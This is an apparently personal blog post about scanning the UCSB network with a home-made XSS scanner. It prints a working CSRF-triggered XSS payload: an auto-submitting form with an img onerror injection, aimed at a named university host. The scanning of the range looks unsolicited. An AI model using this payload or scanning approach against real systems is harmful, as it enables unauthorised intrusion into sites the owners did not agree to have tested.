Breaking UCSB.edu for Fun

Background

I wrote a black box XSS scanner and I scanned 128.111.0.0/16 (UCSB network). The scanner found a few XSS at sbfel3.ucsb.edu.

Demo

The vulnerability is somehow straightforward: old site + old technology = XSS. It is likely not important but popping up something at *.ucsb.edu gives me pleasure to no end :)

Payload

Using CSRF to trigger the self-XSS.

Hosted at https://scf.so/assets/ucsb-xss.html

<form action="http://sbfel3.ucsb.edu/bin/search" method="post">
	<input type="" name="req" value='<img src="x" onerror="alert(`XSS`)" />'>
	<input type="submit" id="sub">
</form>

<script type="text/javascript">
	sub.click()
</script>

December 10, 2020